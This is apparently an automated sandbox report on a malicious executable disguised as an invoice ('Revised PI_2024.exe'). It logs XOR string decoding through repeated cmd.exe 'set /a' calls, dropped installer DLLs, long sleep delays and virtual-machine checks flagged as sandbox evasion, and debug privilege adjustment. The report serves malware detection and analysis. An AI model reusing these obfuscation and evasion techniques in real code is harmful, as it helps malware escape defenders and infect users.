            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00405ECF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405ECF
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_10002D30 push eax; ret 0_2_10002D5E
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF2AF8 push eax; retf 131_2_33EF2AF9
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF30E0 push esp; iretd 131_2_33EF30E1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF30D8 pushad ; iretd 131_2_33EF30D9
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_36DD605F push eax; iretd 131_2_36DD605D
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_36DD6058 push eax; iretd 131_2_36DD605D
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\BgImage.dllJump to dropped file
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\nsDialogs.dllJump to dropped file
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeAPI/Special instruction interceptor: Address: 2A7FE63
            Source: C:\Users\user\Desktop\Revised PI_2024.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeMemory allocated: 33F20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeMemory allocated: 33C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\Desktop\Revised PI_2024.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\BgImage.dllJump to dropped file
            Source: C:\Users\user\Desktop\Revised PI_2024.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Revised PI_2024.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv2AF6.tmp\nsDialogs.dllJump to dropped file
            Source: C:\Users\user\Desktop\Revised PI_2024.exeAPI coverage: 2.4 %
            Source: C:\Users\user\Desktop\Revised PI_2024.exe TID: 3036Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exe TID: 3036Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00405464 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405464
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00405EA8 FindFirstFileA,FindClose,0_2_00405EA8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00402645 FindFirstFileA,131_2_00402645
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00405464 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,131_2_00405464
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00405EA8 FindFirstFileA,FindClose,131_2_00405EA8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeThread delayed: delay time: 600000Jump to behavior
            Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dcaae449bca96b<
            Source: Revised PI_2024.exe, 00000083.00000002.86881921308.0000000003707000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.0000000003728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh1q
            Source: C:\Users\user\Desktop\Revised PI_2024.exeAPI call chain: ExitProcess graph end nodegraph_0-3695
            Source: C:\Users\user\Desktop\Revised PI_2024.exeAPI call chain: ExitProcess graph end nodegraph_0-3852
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00405ECF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405ECF
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
